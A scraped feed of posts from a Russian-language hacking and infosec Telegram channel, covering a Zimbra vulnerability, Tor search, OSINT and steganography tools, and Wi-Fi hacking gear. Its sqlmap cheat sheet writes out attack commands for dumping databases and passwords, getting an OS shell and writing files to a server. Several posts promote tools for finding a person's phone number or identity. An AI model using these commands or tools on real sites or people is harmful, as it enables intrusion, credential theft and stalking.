19074
Актуальные новости и гайды по хакингу и информационной безопасности Сотрудничество: @workhouse_price Мы на бирже: https://telega.in/c/infosec_globe Канал в реестре РКН: https://clck.ru/3FtTN5
👺 Поисковая система Clearnet для скрытых сервисов Tor
Ahmia — это поисковая система для тёмной паутины. Она доступна в обычном Интернете и разработана специально для сети Tor.
🔎 Ahmia позволяет осуществлять поиск через скрытые сервисы. Для открытия некоторых ссылок и результатов может понадобиться браузер Tor.
Ищет любые .onion ссылки.
↘️ Ahmia.fi
💙Записки Безопасника
↔️ Хакеры эксплуатируют критическую уязвимость в Zimbra, отправляя письма на SMTP-сервер
Эксперты по кибербезопасности призывают немедленно обновить почтовые серверы Zimbra, так как новая критическая уязвимость уже активно используется хакерами.
Уязвимость с идентификатором CVE-2024-45519 была обнаружена 27 сентября. Proofpoint сообщает, что атаки на уязвимые серверы начались на следующий день после её публикации.
— Согласно анализу Project Discovery, проблема кроется в библиотеке postjournal Zimbra и связана с недостаточной проверкой пользовательского ввода.
Хакеры могут добавлять фальшивые адреса в поле CC в электронных письмах, которые маскируются под письма от имени Gmail. В результате вместо реальных адресов в поле появляются строки в формате base64, которые обрабатываются почтовыми серверами Zimbra.
🎩 Лучшие сервисы для поиска человека по фотографии
В Интернете есть все. И многое можно найти по фотографии, если знать, как и где искать.
— В этой статье автор расскажет о лучших сервисах для поиска по фотографии.
Поиск по фото можно условно разделить на две категории:
⏺Поиск одинаковых фотографий — это когда берется фотография и осуществляется поиск идентичных фото.
⏺Использование искусственного интеллекта, которое распознает лицо человека и ищет его на фотографиях в сети Интернет.
↘️ Spy-soft.net
💙Записки Безопасника
✋ Шпаргалка по использованию sqlmap
SQLMAP — это инструмент для проникновения с открытым исходным кодом.
SQLMAP позволяет автоматизировать процесс выявления и последующего использования уязвимостей SQL-инъекций и последующего получения контроля над серверами баз данных .
Кроме того, SQLMAP поставляется с механизмом обнаружения, который включает расширенные функции для поддержки тестирования на проникновение.
⏺Базовый скан URL на наличие уязвимостей:
sqlmap -u "http://example.com/page.php?id=1"
sqlmap -u "http://example.com/page.php?id=1" --dbs
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных --tables
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --dump
sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0"
sqlmap -u "http://example.com/page.php?id=1" --current-db --current-user
sqlmap -u "http://example.com/page.php?id=1" --os-shell
sqlmap -u "http://example.com/page.php?id=1" --sql-query "SELECT user, password FROM users"
sqlmap -u "http://example.com/page.php?id=1" --is-dba
sqlmap -u "http://example.com/page.php?id=1" --passwords
sqlmap -u "http://example.com/page.php?id=1" --file-write="/path/to/local/file" --file-dest="/path/to/remote/file"
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --columns
sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"
sqlmap -u "http://example.com/page.php?id=1" --banner
sqlmap -u "http://example.com/login.php" --data="username=admin&password=admin"
📚 Коллекция книг для ИБ специалистов.
• В нашем втором канале проходит небольшой розыгрыш, где победители смогут получить коллекцию актуальных и полезных книг для ИБ специалистов:
- Сети глазами хакера;
- Контролируемый взлом. Библия социальной инженерии;
- Хакерство. Секреты мастерства;
- Тестирование на проникновение с Kali Linux;
- Хакерство. Физические атаки с использованием хакерских устройств.
• Каждый победитель получит сразу весь пул книг в бумажном варианте, которые перечислены выше. Принять участие можно тут: /channel/it_secur/2235
S.E. ▪️ infosec.work ▪️ VT
🖥 Вычисляем реальный IP сервера за CloudFlare/Qrator
Сегодня все большее распространение получают сервисы для защиты от DDoS-атак, скрывающие реальный IP-адрес, типа CloudFlare, Incapsula и Qrator.
🔎 Поэтому в данной заметке автор поделится алгоритмом, которого придерживается во время аудитов, когда приходится участвовать в игре «Найди мой реальный IP».
↘️ Xakep.ru
💙Записки Безопасника
🔏 Поиск местоположения в Instagram
Instagram Location Search
- находит идентификаторы местоположения Instagram вблизи указанной широты и долготы.
Следующая команда будет искать местоположения Instagram рядом с координатами 32.22 N, 110.97 W (в центре Тусона, Аризона):
instagram-location-search --cookie "<instagram-cookies>" --lat 32.22 --lng -110.97 --csv locs.csv
✋ CryptoHack Writeups. CTF: Криптография для начинающих
CTF (Capture The Flag) - соревнования по информационной безопасности, главной целью участников которых является добыча флага путем решения заданий.
🎃 Как вычисляют анонимных авторов?
Рассказываем про стилометрию
Как вычислить анонимного автора, если он не оставил цифрового следа? Нужно искать следы в самом тексте!
— С помощью статистического анализа стиля текста любой желающий может узнать, что ваши тексты принадлежат именно вам, даже если вы публиковались анонимно.
Этим методом пользуются не только безобидные литературные критики, но и спецслужбы.
💙Записки Безопасника
Ищешь работу без многоэтапных интервью и тестовых заданий? 😉
Регистрируйся на One Day Offer для аудиторов кибербезопасности!
28 сентября у тебя будет возможность пройти fast-интервью, познакомиться с командой и забрать долгожданный оффер всего за один день.
Чем мы занимаемся?
👉 Проводим комплексные аудиты кибербезопасности компаний Группы Сбер.
👉 Осуществляем консультационную поддержку CISO и согласовываем планы развития.
👉 Проводим анализ разрыва (GAP-анализ) по результатам аудита.
👉 Развиваем методологию аудитов команды.
Если у тебя есть от 2-х лет опыта работы в сфере кибербезопасности, отправляй заявку прямо сейчас и присоединяйся к команде! 💚
🎃 Буферная электронная почта, или как защитить свой email от спама
Служба анонимной пересылки электронной почты.
AnonAddy — специальный сервис, предлагающий услуги буфера между вашим реальным почтовым адресом и его псевдонимом.
— Защитите свою электронную почту и псевдонимы от спамеров.
🖥 GitHub
💙Записки Безопасника
🥷 Держите, дерево всевозможных аттак на Windows
На вскидку здесь их 200+, не считал
Всё удобненько сгруппировано, чтобы можно было сориентироваться и сразу понять, как...
...тестировать свою 🪟 Windows, а иначе для чего это всё
Ну вы понимаете)
💙Записки Безопасника
↔️ Лавина уязвимостей: 2024 год бьет рекорды по числу киберугроз
Aqua Nautilus приводит 28 000 причин для беспокойства в своем отчете.
Специалисты связывают такую статистику с несколькими факторами.
Широкое применение открытого программного обеспечения позволяет большему количеству разработчиков и исследователей тщательно изучать код.
Повышение осведомленности о киберугрозах среди организаций и экспертов приводит к увеличению числа сообщений об инцидентах.
✋ Прячем файлы в картинках: семь стеганографических утилит для Windows
Шифрование помогает сохранять данные в секрете, но одновременно привлекает лишнее внимание. Если файл так просто не открыть, значит, в нем наверняка есть что-то ценное. Поэтому бывает важно скрыть само наличие секретной информации.
Проще всего это сделать, растворив конфиденциальные данные внутри какого-нибудь безобидного файла.
— Решается такая задача с помощью стеганографических утилит, которые мы и протестируем.
↘️ Xakep.ru
💙Записки Безопасника
↔️ Получение номера телефона цели, просто имея его адрес электронной почты
Email2phonenumber - это инструмент OSINT, который позволяет вам получить номер телефона цели, просто указав его адрес электронной почты.
❗️ Этот инструмент помогает автоматизировать обнаружение чьего-либо номера телефона, злоупотребляя недостатками конструкции сброса пароля и общедоступными данными.
🖥 GitHub
💙Записки Безопасника
🔒 Перебор паролей к базам данных KeePass
KeePass - это бесплатный менеджер паролей с открытым исходным кодом, который поможет вам безопасно управлять паролями.
Вы можете поместить все свои пароли в одну базу данных, которая заблокирована одним мастер-ключом или файлом ключей.
🖥 Выбираем бюджетный адаптер для взлома Wi-Fi
Вардрайвинг (обнаружение и взлом точек доступа Wi-Fi) требует специального оборудования.
Но разоряться на профессиональные устройства вовсе не обязательно.
Среди серийно выпускаемых адаптеров Wi-Fi тоже попадаются пригодные модели. Чтобы превратить их в хакерские девайсы, иногда требуются некоторые манипуляции.
❗️ Автор расскажет, как выбрать такое устройство, где его купить и что с ним делать дальше.
↘️ Xakep.ru
💙Записки Безопасника
👺 Инструменты командной строки для веб-разработчика
Жизнь веб-разработчика омрачена сложностями.
Особенно неприятно, когда источник этих сложностей неизвестен.
То ли это проблема с отправкой запроса, то ли с ответом, то ли со сторонней библиотекой, то ли внешний API глючит?
— Существует куча различных прилад, способных упростить нам жизнь. В этой статье представлены некоторые инструменты командной строки, которые автор считает бесценными.
↘️ Habr.com
💙Записки Безопасника
🎃 CloudSploit - инструмент пробива облачных платформ
CloudSploit от Aqua - это проект с открытым исходным кодом, предназначенный для обнаружения рисков безопасности в учетных записях облачной инфраструктуры, включая:
⏺Amazon Web Services (AWS)
⏺Microsoft Azure
⏺Google Cloud Platform (GCP)
⏺Oracle Cloud Infrastructure (OCI) и GitHub.
Эти скрипты предназначены для возврата ряда потенциальных неправильных конфигураций и рисков безопасности.
🖥 GitHub
💙Записки Безопасника
Разработчики 🔐 Tails и 🧅 Tor Project решили объединить усилия
Некоммерческая организация Tor Project и разработчики Tails сообщили, что объединяют усилия.
❗️ Организации стремятся объединить ресурсы, снизить накладные расходы и более тесно сотрудничать в вопросах развития свободного интернета, защищая пользователей от слежки и цензуры.
Предложение о слиянии поступило от команды Tails в конце прошлого года, поскольку организация переросла существующую структуру и хотела оградить своих сотрудников от дополнительного стресса, связанного с расширением фреймворка.
«После объединения усилий команда Tails сможет сосредоточиться на своей основной миссии — поддержке и улучшении Tails ОС, изучении новых и дополнительных вариантов ее использования, получая при этом преимущества от более крупной организационной структуры The Tor Project»
💬 Кража паролей с помощью Flipper Zero
Flipper Zero — это многофункциональное устройство с открытым исходным кодом для исследования и пентестинга радиопротоколов, систем контроля доступа, аппаратного обеспечения и многого другого.
👀 OSINT: инструменты
Современные реалии таковы, что тем, кто хочет узнать о вас побольше информации, уже не надо долго её собирать по различным материальным источникам.
— Вы сами напишите на себя досье в своих социальных сетях, комментариями под постами друзей и т.д.
❗️ Разведчику нужно только проанализировать весь тот объём информации, который вы ему даёте и структурировать её.
Итак, в статье мы поговорим именно про методы и инструменты OSINT.
↘️ Habr.com
💙Записки Безопасника
👩💻 WordPress заблокировал доступ к своим серверам для клиентов WP Engine
На этой неделе обострился конфликт между WordPress, Automattic (владелец WordPress.com и WooCommerce) и крупным хостинг-провайдером WP Engine.
Разработчики WordPress заблокировали доступ к ресурсам WordPress.org для WP Engine и его клиентов, прекратив обновление плагинов.
Пользователям WP Engine рекомендовали выбрать другого хостинг-провайдера.
— Разработчики WordPress утверждают, что вынуждены пойти на такой шаг из-за изменений, которые WP Engine вносит в основную функциональность WordPress ради получения прибыли, а также из-за блокировки новостного виджета в панели управления тысяч сайтов, чтобы критика действий WP Engine не доходила до конечных пользователей.
Этот конфликт продолжается уже некоторое время. Недавно сооснователь и глава WordPress Мэтт Мулленвег (Matt Mullenweg) назвал WP Engine «раковой опухолью» и обвинил компанию в получении прибыли от WordPress и использовании бренда без какого-либо вклада в развитие CMS.
🥷 Whonix: операционная система для анонимуса
Когда мы говорим об анонимности в интернете, то чаще всего подразумеваем такие проекты, как Tor, I2P, Tor Browser, DNSCrypt и Live CD TAILS, включающий в себя все перечисленное.
— Однако существует менее известная, но очень интересная система Whonix, использующая виртуализацию в качестве средства изоляции рабочей станции от глобальной сети и способная защитить твою анонимность даже после взлома.
↘️ Xakep.ru
💙Записки Безопасника
🥷 Лучшие устройства хакера
В статье отобрано пятнадцать лучших устройств хакера, с которыми можно пентестить все что угодно: от физических устройств до бесконтактных карт.
Сюда не вошли более обыкновенные инструменты вроде отверток и паяльников — их проще выбирать на свой вкус.
Надеемся, вы присмотрите что-нибудь интересное в нашем списке лучших гаджетов хакера.
✋ Обзор бесплатных инструментов для аудита web-ресурсов и не только
Статья содержит краткий обзор и типовые примеры использования бесплатных утилит.
❗️ Данные утилиты помогут хакерам, администраторам, разработчикам, тестировщикам проверить свои ресурсы конкурентов в автоматизированном режиме.
У статьи довольно низкий порог вхождения для понимания и использования, по этому, надеюсь, придется по душе многим. Раскрывается лишь базовый функционал программ.
🤨 Хакерство из фильмов.
Взломщик показал, как взламывает светофоры с помощью девайса Flipper Zero и теперь всегда может ехать «на зелёный».
💙Записки Безопасника
🎃 Компьютерная криминалистика (Форензика)
Специалисты в этой области анализируют трафик, системные сбои, ошибки пользователей и разные инциденты информационной безопасности, ведут их учет и ищут сокрытые данные и другие возможные следы взлома.
В задачи специалистов компьютерной криминалистики также входит обнаружение неконтролируедамых изменений систем и сбои программного обеспечения, нарушение правил доступа и несоблюдение политики или рекомендаций по «Информационной безопасности».
👀 Инструменты OSINT для Onion сайтов
⏺Поисковые утилиты:
OnionSearch - https://github.com/megadose/OnionSearch
Darkdump - https://github.com/josh0xA/darkdump
Ahmia Search Engine - ahmia.fi, https://github.com/ahmia/ahmia-site,
DarkSearch - https://darksearch.io/, https://github.com/thehappydinoa/DarkSearch
Katana - https://github.com/adnane-X-tebbaa/Katana
⏺Инструменты для получения onion ссылок:
Hunchly - https://www.hunch.ly/darkweb-osint/
H-Indexer - http://jncyepk6zbnosf4p.onion/onions.html
Tor66 Fresh Onions - http://tor66sewebgixwhcqfnp5inzp5x5uohhdy3kvtnyfxc2e5mxiuh34iid.onion/fresh
⏺Инструменты для сканирования:
Onionscan - https://github.com/s-rah/onionscan
Onioff - https://github.com/k4m4/onioff
Onion-nmap - https://github.com/milesrichardson/docker-onion-nmap
⏺Краулеры:
TorBot - https://github.com/DedSecInside/TorBot
TorCrawl - https://github.com/MikeMeliz/TorCrawl.py
VigilantOnion - https://github.com/andreyglauzer/VigilantOnion
OnionIngestor - https://github.com/danieleperera/OnionIngestor
⏺Прочее:
DeepDarkCTI - https://github.com/fastfire/deepdarkCTI
💙Записки Безопасника
🔒 Как содержать пароли
В данной статье говорится о том, как организовать свои аккаунты. Как сделать доступ к ним достаточно надёжным и стойким к утере девайсов.
Как можно залогиниться туда, где многофакторная авторизация через телефон, в случае потери телефона.
Или, как обезопасить себя от забывания мастер пароля от менеджера паролей?
↘️ Habr.com
💙Записки Безопасника